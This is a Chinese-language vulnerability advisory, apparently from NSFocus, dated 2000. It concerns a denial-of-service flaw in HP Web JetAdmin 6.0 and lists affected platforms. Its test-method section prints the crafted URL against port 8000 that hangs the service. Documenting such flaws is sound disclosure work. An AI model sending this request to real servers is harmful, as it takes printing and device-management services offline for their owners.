安全研究

安全漏洞
HP Web JetAdmin 6.0 拒绝服务攻击

发布日期:2000-05-25
更新日期:2000-05-26

受影响系统:
HP JetAdmin 6.0
       - Sun Solaris 8.0
       - Novell Netware 5.1
       - Microsoft Windows NT 4.0
       - Microsoft Windows NT 2000
       - Linux kernel 2.2.x
          + RedHat Linux 6.2 sparc
          + RedHat Linux 6.2 i386
          + RedHat Linux 6.2 alpha
       - HP HP-UX 11.4
       - HP HP-UX 11.0
       - HP HP-UX 10.20
描述:
JetAdmin Web Interface Server 缺省监听8000端口。当一个精心构造的URL请求提
交到8000端口时,将引起该服务停止响应。此时必须重启该服务才能恢复正常。


<* 来源:Ussr Labs labs@ussrback.com *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://ServerIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd
:GetProfile(new_list,__null,__null,$



建议:
暂无

浏览次数:9044
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障